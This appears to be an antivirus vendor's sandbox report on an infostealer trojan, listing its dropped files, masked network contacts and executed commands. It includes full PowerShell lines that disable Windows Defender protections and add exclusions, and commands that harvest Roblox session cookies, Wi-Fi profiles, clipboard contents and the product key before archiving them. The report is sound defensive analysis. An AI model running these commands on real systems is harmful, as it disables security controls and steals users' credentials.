Trojan.Siggen32.3023

Technical Information

Malicious functions

To complicate detection of its presence in the operating system,

adds antivirus exclusion:

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%TEMP%\svchost_3000.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -Enabl...
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‎ .scr'

Modifies file system

Creates the following files

%TEMP%\_mei41122\vcruntime140.dll
%TEMP%\_mei41122\_bz2.pyd
%TEMP%\_mei41122\_ctypes.pyd
%TEMP%\_mei41122\_decimal.pyd
%TEMP%\_mei41122\_hashlib.pyd
%TEMP%\_mei41122\_lzma.pyd
%TEMP%\_mei41122\_socket.pyd
%TEMP%\_mei41122\base_library.zip
%TEMP%\_mei41122\libcrypto-3.dll
%TEMP%\_mei41122\libffi-8.dll
%TEMP%\_mei41122\python313.dll
%TEMP%\_mei41122\select.pyd
%TEMP%\_mei41122\unicodedata.pyd
%TEMP%\ef4zi85o
%TEMP%\svchost_3000.exe
%TEMP%\_mei48402\vcruntime140.dll
%TEMP%\_mei48402\vcruntime140_1.dll
%TEMP%\_mei48402\_asyncio.pyd
%TEMP%\_mei48402\_bz2.pyd
%TEMP%\_mei48402\_ctypes.pyd
%TEMP%\_mei48402\_decimal.pyd
%TEMP%\_mei48402\_hashlib.pyd
%TEMP%\_mei48402\_lzma.pyd
%TEMP%\_mei48402\_multiprocessing.pyd
%TEMP%\_mei48402\_overlapped.pyd
%TEMP%\_mei48402\_queue.pyd
%TEMP%\_mei48402\_socket.pyd
%TEMP%\_mei48402\_sqlite3.pyd
%TEMP%\_mei48402\_ssl.pyd
%TEMP%\_mei48402\_wmi.pyd
%TEMP%\_mei48402\base_library.zip
%TEMP%\_mei48402\blank.aes
%TEMP%\_mei48402\libcrypto-3.dll
%TEMP%\_mei48402\libffi-8.dll
%TEMP%\_mei48402\libssl-3.dll
%TEMP%\_mei48402\pyexpat.pyd
%TEMP%\_mei48402\python313.dll
%TEMP%\_mei48402\rar.exe
%TEMP%\_mei48402\rarreg.key
%TEMP%\_mei48402\select.pyd
%TEMP%\_mei48402\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\installer
%TEMP%\_mei48402\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\license
%TEMP%\_mei48402\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\metadata
%TEMP%\_mei48402\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\record
%TEMP%\_mei48402\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\wheel
%TEMP%\_mei48402\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt
%TEMP%\_mei48402\setuptools\_vendor\jaraco\text\lorem ipsum.txt
%TEMP%\_mei48402\sqlite3.dll
%TEMP%\_mei48402\unicodedata.pyd
%ALLUSERSPROFILE%\microsoft\windows\start menu\programs\startup\‏ ‎ .scr
%TEMP%\ ‌ ‌ ‏ \system\antivirus.txt
%TEMP%\pgmntboq\pgmntboq.0.cs
%TEMP%\pgmntboq\pgmntboq.cmdline
%TEMP%\pgmntboq\pgmntboq.out
%TEMP%\pgmntboq\csc75e945f64ec24fce96beb3b059e9065.tmp
%TEMP%\res738a.tmp
%TEMP%\pgmntboq\pgmntboq.dll
%TEMP%\ ‌ ‌ ‏ \display (1).png
%TEMP%\ ‌ ‌ ‏ \directories\desktop.txt
%TEMP%\ ‌ ‌ ‏ \directories\pictures.txt
%TEMP%\ ‌ ‌ ‏ \directories\documents.txt
%TEMP%\ ‌ ‌ ‏ \directories\music.txt
%TEMP%\ ‌ ‌ ‏ \directories\videos.txt
%TEMP%\ ‌ ‌ ‏ \directories\downloads.txt
%TEMP%\ ‌ ‌ ‏ \system\system info.txt
%TEMP%\ ‌ ‌ ‏ \system\mac addresses.txt
%TEMP%\ ‌ ‌ ‏ \system\task list.txt
%TEMP%\9fj5cfznhq.tmp
%TEMP%\oftkgvzebn.tmp
%TEMP%\t2adqzfome.tmp
%TEMP%\zwcfy.zip

Deletes following files that it created itself

%TEMP%\ef4zi85o
%TEMP%\_mei41122\base_library.zip
%TEMP%\_mei41122\libcrypto-3.dll
%TEMP%\_mei41122\libffi-8.dll
%TEMP%\_mei41122\python313.dll
%TEMP%\_mei41122\select.pyd
%TEMP%\_mei41122\unicodedata.pyd
%TEMP%\_mei41122\vcruntime140.dll
%TEMP%\_mei41122\_bz2.pyd
%TEMP%\_mei41122\_ctypes.pyd
%TEMP%\_mei41122\_decimal.pyd
%TEMP%\_mei41122\_hashlib.pyd
%TEMP%\_mei41122\_lzma.pyd
%TEMP%\_mei41122\_socket.pyd
%TEMP%\res738a.tmp
%TEMP%\pgmntboq\csc75e945f64ec24fce96beb3b059e9065.tmp
%TEMP%\pgmntboq\pgmntboq.0.cs
%TEMP%\pgmntboq\pgmntboq.out
%TEMP%\pgmntboq\pgmntboq.cmdline
%TEMP%\pgmntboq\pgmntboq.dll
%TEMP%\9fj5cfznhq.tmp
%TEMP%\oftkgvzebn.tmp
%TEMP%\t2adqzfome.tmp

Network activity

Connects to

'gs##tic.com':443
'ip##pi.com':80
'di##ord.com':443

TCP

HTTP GET requests

http://ip##pi.com/json/?fi###########

Other

'gs##tic.com':443
'di##ord.com':443

UDP

DNS ASK gs##tic.com
DNS ASK ip##pi.com
DNS ASK di##ord.com

Miscellaneous

Creates and executes the following

'%TEMP%\svchost_3000.exe'
'%TEMP%\_mei48402\rar.exe' a -r -hp"blank" "%TEMP%\ZWCfy.zip" *

Restarts the analyzed sample

Executes the following

'<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '%TEMP%\svchost_3000.exe'"
'<SYSTEM32>\cmd.exe' /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess ...
'<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‎ .scr'"
'<SYSTEM32>\cmd.exe' /c "tasklist /FO LIST"
'<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value"
'<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Steam\\Steam.lnk" get target /value"
'<SYSTEM32>\cmd.exe' /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
'<SYSTEM32>\cmd.exe' /c "powershell Get-Clipboard"
'<SYSTEM32>\cmd.exe' /c "tree /A /F"
'<SYSTEM32>\cmd.exe' /c "netsh wlan show profile"
'<SYSTEM32>\cmd.exe' /c "systeminfo"
'<SYSTEM32>\cmd.exe' /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbAB...
'<SYSTEM32>\tasklist.exe' /FO LIST
'<SYSTEM32>\wbem\wmic.exe' path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value
'<SYSTEM32>\wbem\wmic.exe' /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
'<SYSTEM32>\wbem\wmic.exe' path win32_shortcutfile where name="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Steam\\Steam.lnk" get target /value
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-Clipboard
'<SYSTEM32>\tree.com' /A /F
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC...
'<SYSTEM32>\netsh.exe' wlan show profile
'<SYSTEM32>\systeminfo.exe'
'%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\pgmntboq\pgmntboq.cmdline"
'%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES738A.tmp" "%TEMP%\pgmntboq\CSC75E945F64EC24FCE96BEB3B059E9065.TMP"
'<SYSTEM32>\cmd.exe' /c "getmac"
'<SYSTEM32>\getmac.exe'
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
'<SYSTEM32>\cmd.exe' /c "%TEMP%\_MEI48402\rar.exe a -r -hp"blank" "%TEMP%\ZWCfy.zip" *"
'<SYSTEM32>\cmd.exe' /c "wmic os get Caption"
'<SYSTEM32>\wbem\wmic.exe' os get Caption
'<SYSTEM32>\cmd.exe' /c "wmic computersystem get totalphysicalmemory"
'<SYSTEM32>\wbem\wmic.exe' computersystem get totalphysicalmemory
'<SYSTEM32>\cmd.exe' /c "wmic csproduct get uuid"
'<SYSTEM32>\wbem\wmic.exe' csproduct get uuid
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
'<SYSTEM32>\cmd.exe' /c "wmic path win32_VideoController get name"
'<SYSTEM32>\wbem\wmic.exe' path win32_VideoController get name
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
'%TEMP%\svchost_3000.exe' ' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '%TEMP%\svchost_3000.exe'"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess ...' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell -Command Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‎ .scr'"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "tasklist /FO LIST"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Telegram Desktop\\Telegram.lnk" get target /value"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "wmic path win32_shortcutfile where name="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Steam\\Steam.lnk" get target /value"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell Get-Clipboard"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "tree /A /F"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "netsh wlan show profile"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "systeminfo"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbAB...' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\pgmntboq\pgmntboq.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES738A.tmp" "%TEMP%\pgmntboq\CSC75E945F64EC24FCE96BEB3B059E9065.TMP"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "getmac"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "%TEMP%\_MEI48402\rar.exe a -r -hp"blank" "%TEMP%\ZWCfy.zip" *"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "wmic os get Caption"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "wmic computersystem get totalphysicalmemory"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "wmic csproduct get uuid"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "wmic path win32_VideoController get name"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"' (with hidden window)

Technologies

Begriffe

Schulung und Training

Mythen

Technical Information

Curing recommendations

Free trial